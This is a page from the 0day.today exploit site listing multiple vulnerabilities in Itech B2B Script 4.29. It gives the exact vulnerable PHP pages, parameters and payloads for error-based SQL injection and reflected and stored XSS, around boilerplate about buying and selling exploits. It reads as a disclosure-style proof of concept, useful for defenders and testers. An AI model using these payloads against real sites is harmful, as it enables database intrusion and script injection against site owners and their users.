0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Itech B2B Script 4.29 - Multiple Vulnerabilities
Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability Google Dork : - Date : 12/02/2017 Exploit Author : Marc Castejon <marc@silentbreach.com> Vendor Homepage : http://itechscripts.com/b2b-script/ Software Link: http://b2b.itechscripts.com Type : webapps Platform: PHP Version: 4.29 Sofware Price and Demo : $250 ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/search.php Vulnerable Parameters: keywords Method: GET Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)# ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/search.php Vulnerable Parameters: rctyp Method: GET Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)# ----------------------------------------------- Type: Reflected XSS Vulnerable URL:http://localhost/[PATH]/search.php Vulnerable Parameters: rctyp Method: GET Payload: <img src=i onerror=prompt(1)> ----------------------------------------------- Type: Reflected XSS Vulnerable URL:http://localhost/[PATH]/search.php Vulnerable Parameters: keyword Method: GET Payload: <img src=i onerror=prompt(1)> ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/catcompany.php Vulnerable Parameters: token Method: GET Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)# ----------------------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/buyleads-details.php Vulnerable Parameters: id Method: GET Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)# ----------------------------------------------- Type: Stored XSS Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php Vulnerable Parameters: msg_message Method: POST Payload: <img src=i onerror=prompt(1)> ------------------------------------------------ Type: Stored XSS Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php Vulnerable Parameters: fname Method: POST Payload: <img src=i onerror=prompt(1)> # 0day.today [2024-12-26] #